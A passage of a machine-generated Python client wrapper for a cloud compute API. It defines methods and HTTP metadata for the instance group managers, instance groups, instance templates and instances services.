  """Resizes the managed instance group. If you increase the size, the group creates new instances using the current instance template. If you decrease the size, the group deletes instances. The resize operation is marked DONE when the resize actions are scheduled even if the group has not yet added or deleted any instances. You must separately verify the status of the creating or deleting actions with the listmanagedinstances method.

  If the group is part of a backend service that has enabled connection
  draining, it can take up to 60 seconds after the connection draining
  duration has elapsed before the VM instance is removed or deleted.

  Args:
    request: (ComputeInstanceGroupManagersResizeRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('Resize'), request,
      global_params=global_params)

# Wire-level metadata; `size` travels as a query parameter, not a body field.
Resize.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.resize',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/resize',
    ordered_params=[u'project', u'zone', u'instanceGroupManager', u'size'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId', u'size'],
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersResizeRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def ResizeAdvanced(self, request, global_params=None):
  """Resizes the managed instance group with advanced configuration options like disabling creation retries. This is an extended version of the resize method.

  If you increase the size of the instance group, the group creates new
  instances using the current instance template. If you decrease the size,
  the group deletes instances. The resize operation is marked DONE when the
  resize actions are scheduled even if the group has not yet added or
  deleted any instances. You must separately verify the status of the
  creating, creatingWithoutRetries, or deleting actions with the get or
  listmanagedinstances method.

  If the group is part of a backend service that has enabled connection
  draining, it can take up to 60 seconds after the connection draining
  duration has elapsed before the VM instance is removed or deleted.

  Args:
    request: (ComputeInstanceGroupManagersResizeAdvancedRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('ResizeAdvanced'), request,
      global_params=global_params)

# Wire-level metadata, built lazily.
ResizeAdvanced.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.resizeAdvanced',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/resizeAdvanced',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagersResizeAdvancedRequest',
    request_type_name=u'ComputeInstanceGroupManagersResizeAdvancedRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetAutoHealingPolicies(self, request, global_params=None):
  """Modifies the autohealing policies.

  Args:
    request: (ComputeInstanceGroupManagersSetAutoHealingPoliciesRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('SetAutoHealingPolicies'), request,
      global_params=global_params)

# Wire-level metadata, built lazily.
SetAutoHealingPolicies.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.setAutoHealingPolicies',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setAutoHealingPolicies',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagersSetAutoHealingRequest',
    request_type_name=u'ComputeInstanceGroupManagersSetAutoHealingPoliciesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetInstanceTemplate(self, request, global_params=None):
  """Specifies the instance template to use when creating new instances in this group. The templates for existing instances in the group do not change unless you recreate them.

  Args:
    request: (ComputeInstanceGroupManagersSetInstanceTemplateRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('SetInstanceTemplate'), request,
      global_params=global_params)

# Wire-level metadata, built lazily.
SetInstanceTemplate.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.setInstanceTemplate',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setInstanceTemplate',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagersSetInstanceTemplateRequest',
    request_type_name=u'ComputeInstanceGroupManagersSetInstanceTemplateRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetTargetPools(self, request, global_params=None):
  """Modifies the target pools to which all instances in this managed instance group are assigned. The target pools automatically apply to all of the instances in the managed instance group. This operation is marked DONE when you make the request even if the instances have not yet been added to their target pools. The change might take some time to apply to all of the instances in the group depending on the size of the group.

  Args:
    request: (ComputeInstanceGroupManagersSetTargetPoolsRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('SetTargetPools'), request,
      global_params=global_params)

# Wire-level metadata, built lazily.
SetTargetPools.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.setTargetPools',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setTargetPools',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagersSetTargetPoolsRequest',
    request_type_name=u'ComputeInstanceGroupManagersSetTargetPoolsRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
  """Returns permissions that a caller has on the specified resource.

  Args:
    request: (ComputeInstanceGroupManagersTestIamPermissionsRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (TestPermissionsResponse) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('TestIamPermissions'), request,
      global_params=global_params)

# Wire-level metadata; note the resource name is addressed via {resource}.
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.testIamPermissions',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{resource}/testIamPermissions',
    ordered_params=[u'project', u'zone', u'resource'],
    path_params=[u'project', u'resource', u'zone'],
    query_params=[],
    request_field=u'testPermissionsRequest',
    request_type_name=u'ComputeInstanceGroupManagersTestIamPermissionsRequest',
    response_type_name=u'TestPermissionsResponse',
    supports_download=False,
)
def Update(self, request, global_params=None):
  """Updates a managed instance group using the information that you specify in the request. This operation is marked as DONE when the group is updated even if the instances in the group have not yet been updated. You must separately verify the status of the individual instances with the listManagedInstances method.

  Args:
    request: (ComputeInstanceGroupManagersUpdateRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('Update'), request,
      global_params=global_params)

# Wire-level metadata; full-replacement semantics via HTTP PUT.
Update.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.update',
    http_method=u'PUT',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagerResource',
    request_type_name=u'ComputeInstanceGroupManagersUpdateRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
class InstanceGroupsService(base_api.BaseApiService):
  """Service class for the instanceGroups resource."""

  # NOTE: machine-generated (apitools) wrapper. Every public method follows
  # the same pattern: fetch the lazily-built ApiMethodInfo descriptor via
  # GetMethodConfig and delegate the HTTP round trip to
  # base_api.BaseApiService._RunMethod. The `X.method_config` lambdas below
  # each method hold the wire-level metadata (HTTP verb, URL template,
  # path/query parameter mapping, request/response message type names).

  _NAME = u'instanceGroups'

  def __init__(self, client):
    super(ComputeBeta.InstanceGroupsService, self).__init__(client)
    # No media/resumable-upload configurations for this service.
    self._upload_configs = {
        }

  def AddInstances(self, request, global_params=None):
    """Adds a list of instances to the specified instance group. All of the instances in the instance group must be in the same network/subnetwork. Read Adding instances for more information.

    Args:
      request: (ComputeInstanceGroupsAddInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('AddInstances')
    return self._RunMethod(
        config, request, global_params=global_params)

  AddInstances.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.instanceGroups.addInstances',
      ordered_params=[u'project', u'zone', u'instanceGroup'],
      path_params=[u'instanceGroup', u'project', u'zone'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/addInstances',
      request_field=u'instanceGroupsAddInstancesRequest',
      request_type_name=u'ComputeInstanceGroupsAddInstancesRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def AggregatedList(self, request, global_params=None):
    """Retrieves the list of instance groups and sorts them by zone.

    Args:
      request: (ComputeInstanceGroupsAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceGroupAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.instanceGroups.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/instanceGroups',
      request_field='',
      request_type_name=u'ComputeInstanceGroupsAggregatedListRequest',
      response_type_name=u'InstanceGroupAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified instance group. The instances in the group are not deleted. Note that instance group must not belong to a backend service. Read Deleting an instance group for more information.

    Args:
      request: (ComputeInstanceGroupsDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.instanceGroups.delete',
      ordered_params=[u'project', u'zone', u'instanceGroup'],
      path_params=[u'instanceGroup', u'project', u'zone'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}',
      request_field='',
      request_type_name=u'ComputeInstanceGroupsDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified instance group. Get a list of available instance groups by making a list() request.

    Args:
      request: (ComputeInstanceGroupsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceGroup) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.instanceGroups.get',
      ordered_params=[u'project', u'zone', u'instanceGroup'],
      path_params=[u'instanceGroup', u'project', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}',
      request_field='',
      request_type_name=u'ComputeInstanceGroupsGetRequest',
      response_type_name=u'InstanceGroup',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates an instance group in the specified project using the parameters that are included in the request.

    Args:
      request: (ComputeInstanceGroupsInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.instanceGroups.insert',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/zones/{zone}/instanceGroups',
      request_field=u'instanceGroup',
      request_type_name=u'ComputeInstanceGroupsInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of instance groups that are located in the specified project and zone.

    Args:
      request: (ComputeInstanceGroupsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceGroupList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.instanceGroups.list',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/zones/{zone}/instanceGroups',
      request_field='',
      request_type_name=u'ComputeInstanceGroupsListRequest',
      response_type_name=u'InstanceGroupList',
      supports_download=False,
  )

  def ListInstances(self, request, global_params=None):
    """Lists the instances in the specified instance group.

    Args:
      request: (ComputeInstanceGroupsListInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceGroupsListInstances) The response message.
    """
    config = self.GetMethodConfig('ListInstances')
    return self._RunMethod(
        config, request, global_params=global_params)

  # NOTE: a POST despite being a read — the filter body rides in the request
  # message (instanceGroupsListInstancesRequest).
  ListInstances.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.instanceGroups.listInstances',
      ordered_params=[u'project', u'zone', u'instanceGroup'],
      path_params=[u'instanceGroup', u'project', u'zone'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/listInstances',
      request_field=u'instanceGroupsListInstancesRequest',
      request_type_name=u'ComputeInstanceGroupsListInstancesRequest',
      response_type_name=u'InstanceGroupsListInstances',
      supports_download=False,
  )

  def RemoveInstances(self, request, global_params=None):
    """Removes one or more instances from the specified instance group, but does not delete those instances.

    If the group is part of a backend service that has enabled connection
    draining, it can take up to 60 seconds after the connection draining
    duration before the VM instance is removed or deleted.

    Args:
      request: (ComputeInstanceGroupsRemoveInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('RemoveInstances')
    return self._RunMethod(
        config, request, global_params=global_params)

  RemoveInstances.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.instanceGroups.removeInstances',
      ordered_params=[u'project', u'zone', u'instanceGroup'],
      path_params=[u'instanceGroup', u'project', u'zone'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/removeInstances',
      request_field=u'instanceGroupsRemoveInstancesRequest',
      request_type_name=u'ComputeInstanceGroupsRemoveInstancesRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetNamedPorts(self, request, global_params=None):
    """Sets the named ports for the specified instance group.

    Args:
      request: (ComputeInstanceGroupsSetNamedPortsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetNamedPorts')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetNamedPorts.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.instanceGroups.setNamedPorts',
      ordered_params=[u'project', u'zone', u'instanceGroup'],
      path_params=[u'instanceGroup', u'project', u'zone'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/setNamedPorts',
      request_field=u'instanceGroupsSetNamedPortsRequest',
      request_type_name=u'ComputeInstanceGroupsSetNamedPortsRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeInstanceGroupsTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.instanceGroups.testIamPermissions',
      ordered_params=[u'project', u'zone', u'resource'],
      path_params=[u'project', u'resource', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeInstanceGroupsTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class InstanceTemplatesService(base_api.BaseApiService):
  """Service class for the instanceTemplates resource."""

  # NOTE: machine-generated (apitools) wrapper. Each public method fetches a
  # lazily-built ApiMethodInfo descriptor (the `X.method_config` lambdas)
  # and delegates the HTTP round trip to base_api.BaseApiService._RunMethod.
  # Instance templates are global resources: every relative_path below uses
  # projects/{project}/global/... with no zone segment.

  _NAME = u'instanceTemplates'

  def __init__(self, client):
    super(ComputeBeta.InstanceTemplatesService, self).__init__(client)
    # No media/resumable-upload configurations for this service.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified instance template. Deleting an instance template is permanent and cannot be undone. It's not possible to delete templates which are in use by an instance group.

    Args:
      request: (ComputeInstanceTemplatesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.instanceTemplates.delete',
      ordered_params=[u'project', u'instanceTemplate'],
      path_params=[u'instanceTemplate', u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/instanceTemplates/{instanceTemplate}',
      request_field='',
      request_type_name=u'ComputeInstanceTemplatesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified instance template. Gets a list of available instance templates by making a list() request.

    Args:
      request: (ComputeInstanceTemplatesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceTemplate) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.instanceTemplates.get',
      ordered_params=[u'project', u'instanceTemplate'],
      path_params=[u'instanceTemplate', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/instanceTemplates/{instanceTemplate}',
      request_field='',
      request_type_name=u'ComputeInstanceTemplatesGetRequest',
      response_type_name=u'InstanceTemplate',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates an instance template in the specified project using the data that is included in the request. If you are creating a new template to update an existing instance group, your new instance template must use the same network or, if applicable, the same subnetwork as the original template.

    Args:
      request: (ComputeInstanceTemplatesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.instanceTemplates.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/instanceTemplates',
      request_field=u'instanceTemplate',
      request_type_name=u'ComputeInstanceTemplatesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of instance templates that are contained within the specified project and zone.

    Args:
      request: (ComputeInstanceTemplatesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceTemplateList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.instanceTemplates.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/instanceTemplates',
      request_field='',
      request_type_name=u'ComputeInstanceTemplatesListRequest',
      response_type_name=u'InstanceTemplateList',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeInstanceTemplatesTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.instanceTemplates.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/instanceTemplates/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeInstanceTemplatesTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class InstancesService(base_api.BaseApiService):
"""Service class for the instances resource."""
_NAME = u'instances'
def __init__(self, client):
  """Bind this service wrapper to *client* (the generated ComputeBeta client)."""
  super(ComputeBeta.InstancesService, self).__init__(client)
  # No media/resumable-upload configurations for this service.
  self._upload_configs = {
      }
def AddAccessConfig(self, request, global_params=None):
  """Adds an access config to an instance's network interface.

  Args:
    request: (ComputeInstancesAddAccessConfigRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the lazily-built method descriptor and delegate the HTTP round
  # trip to the shared machinery in base_api.BaseApiService.
  return self._RunMethod(
      self.GetMethodConfig('AddAccessConfig'), request,
      global_params=global_params)

# Wire-level metadata; networkInterface is selected via a query parameter.
AddAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instances.addAccessConfig',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/addAccessConfig',
    ordered_params=[u'project', u'zone', u'instance', u'networkInterface'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'networkInterface', u'requestId'],
    request_field=u'accessConfig',
    request_type_name=u'ComputeInstancesAddAccessConfigRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def AggregatedList(self, request, global_params=None):
  """Retrieves aggregated list of instances.

  Args:
    request: (ComputeInstancesAggregatedListRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (InstanceAggregatedList) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('AggregatedList'), request,
      global_params=global_params)

# Wire-level metadata, built lazily.
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instances.aggregatedList',
    http_method=u'GET',
    relative_path=u'projects/{project}/aggregated/instances',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeInstancesAggregatedListRequest',
    response_type_name=u'InstanceAggregatedList',
    supports_download=False,
)
def AttachDisk(self, request, global_params=None):
  """Attaches an existing Disk resource to an instance. You must first create the disk before you can attach it. It is not possible to create and attach a disk at the same time. For more information, read Adding a persistent disk to your instance.

  Args:
    request: (ComputeInstancesAttachDiskRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('AttachDisk'), request,
      global_params=global_params)

# Wire-level metadata, built lazily.
AttachDisk.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instances.attachDisk',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/attachDisk',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'forceAttach', u'requestId'],
    request_field=u'attachedDisk',
    request_type_name=u'ComputeInstancesAttachDiskRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Delete(self, request, global_params=None):
  """Deletes the specified Instance resource. For more information, see Stopping or Deleting an Instance.

  Args:
    request: (ComputeInstancesDeleteRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('Delete'), request,
      global_params=global_params)

# Wire-level metadata, built lazily.
Delete.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instances.delete',
    http_method=u'DELETE',
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field='',
    request_type_name=u'ComputeInstancesDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def DeleteAccessConfig(self, request, global_params=None):
  """Deletes an access config from an instance's network interface.

  Args:
    request: (ComputeInstancesDeleteAccessConfigRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('DeleteAccessConfig'), request,
      global_params=global_params)

# Wire-level metadata; the access config and interface are named via query
# parameters, so there is no request body field.
DeleteAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instances.deleteAccessConfig',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/deleteAccessConfig',
    ordered_params=[u'project', u'zone', u'instance', u'accessConfig', u'networkInterface'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'accessConfig', u'networkInterface', u'requestId'],
    request_field='',
    request_type_name=u'ComputeInstancesDeleteAccessConfigRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def DetachDisk(self, request, global_params=None):
  """Detaches a disk from an instance.

  Args:
    request: (ComputeInstancesDetachDiskRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('DetachDisk'), request,
      global_params=global_params)

# Wire-level metadata; the disk is named by its deviceName query parameter.
DetachDisk.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instances.detachDisk',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/detachDisk',
    ordered_params=[u'project', u'zone', u'instance', u'deviceName'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'deviceName', u'requestId'],
    request_field='',
    request_type_name=u'ComputeInstancesDetachDiskRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
  """Returns the specified Instance resource. Get a list of available instances by making a list() request.

  Args:
    request: (ComputeInstancesGetRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Instance) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('Get'), request,
      global_params=global_params)

# Wire-level metadata, built lazily.
Get.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instances.get',
    http_method=u'GET',
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    request_field='',
    request_type_name=u'ComputeInstancesGetRequest',
    response_type_name=u'Instance',
    supports_download=False,
)
def GetSerialPortOutput(self, request, global_params=None):
  """Returns the specified instance's serial port output.

  Args:
    request: (ComputeInstancesGetSerialPortOutputRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (SerialPortOutput) The response message.
  """
  # Delegate to the shared transport using the lazily-built descriptor.
  return self._RunMethod(
      self.GetMethodConfig('GetSerialPortOutput'), request,
      global_params=global_params)

# Wire-level metadata; port selection and byte offset travel as query params.
GetSerialPortOutput.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instances.getSerialPortOutput',
    http_method=u'GET',
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/serialPort',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'port', u'start'],
    request_field='',
    request_type_name=u'ComputeInstancesGetSerialPortOutputRequest',
    response_type_name=u'SerialPortOutput',
    supports_download=False,
)
def Insert(self, request, global_params=None):
  """Creates an instance resource in the specified project using the data included in the request.

  Args:
    request: (ComputeInstancesInsertRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('Insert'), request, global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
Insert.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.insert',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[u'requestId', u'sourceInstanceTemplate'],
    relative_path=u'projects/{project}/zones/{zone}/instances',
